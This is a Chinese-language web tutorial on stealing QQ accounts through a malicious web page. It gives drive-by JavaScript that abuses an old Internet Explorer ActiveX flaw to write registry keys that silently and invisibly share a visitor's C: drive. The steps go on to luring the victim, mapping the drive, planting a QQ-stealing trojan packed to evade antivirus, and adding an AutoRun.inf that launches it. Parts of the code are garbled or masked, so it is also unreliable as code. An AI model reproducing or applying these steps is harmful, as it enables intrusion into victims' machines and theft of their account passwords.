萬盛學電腦網

 萬盛學電腦網 >> 病毒防治 >> 黑客通過網頁竊取QQ方法解析

黑客通過網頁竊取QQ方法解析

  要想偷別人的QQ,方法有很多了。利用惡意網頁使對方的電腦被共享出來是很有趣的一招。方法是:在你的網站網頁中加入如下內容的代碼:

<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject()Shl.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Type",0,"REG_DWORD");
Shl.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Path","C:");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>

  上面的代碼大家一定很容易讀懂,簡單說來就是通過修改對方注冊表中的鍵值,把對方的C盤共享出來,如果想讓對方的其他盤都共享請自行設置。

  述代碼中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外殼對象。WSH是微軟提供的一種基於32位Windows平台的、與語言無關的腳本解釋機制,它使得腳本能夠直接在Windows桌面或命令提示符下運行。WSH使得腳本可以被執行,就象執行批處理一樣。以“Shl.RegWrite”開頭的這幾句代碼的作用是寫入浏覽者的注冊表,就是它們使得對方的硬盤被共享的。把“Flags”的鍵值設為00000302可以隱藏共享,使對方無法發現,非常隱蔽。

  網頁做好後,把它上傳你的主頁空間,騙他浏覽你的網頁(就看你的嘴皮子功夫了),如果對方的IE沒有打補丁(網上這樣的電腦有很多),就可以把他的C盤共享出來。整個方法的原理就是把com.ms.activeX.ActiveXComponent對象嵌入<APPLET>標記中,這樣會導致任意創建和解釋執行ActiveX對象,使我們可以創建任意文件、運行程序、寫注冊表。未打補丁的IE,在打開含有上述代碼的網頁時不會有任何警告,我們就是利用這個漏洞把對方的硬盤被共享出來。

  等對方中招後,就把對方的硬盤映射過來,可以使用net use命令,也可以使用網絡刺客II等軟件。下一步可以給對方植入一個盜QQ的軟件,比方說QQ殺手等,注意一定要用ASPack或其他加殼軟件給木馬加殼(其實就是另類“壓縮”),防止殺毒軟件發現。

  最後,打開記事本鍵入以下內容:

[AutoRun]
open=winnt32.exe

  保存為AutoRun.inf,其中的winnt32.exe為木馬文件。把AutoRun.inf和winnt32.exe一起拷到對方某分區的根目錄下。這樣,只要他雙擊該分區就會中木馬!這樣可以大大的增加木馬運行的主動性!須知許多人現在都非常警惕,不熟悉的文件他們輕易的不會運行,而這種方法就很難防范了。

  以後,你就等著用郵箱收信收對方的QQ密碼吧。

copyright © 萬盛學電腦網 all rights reserved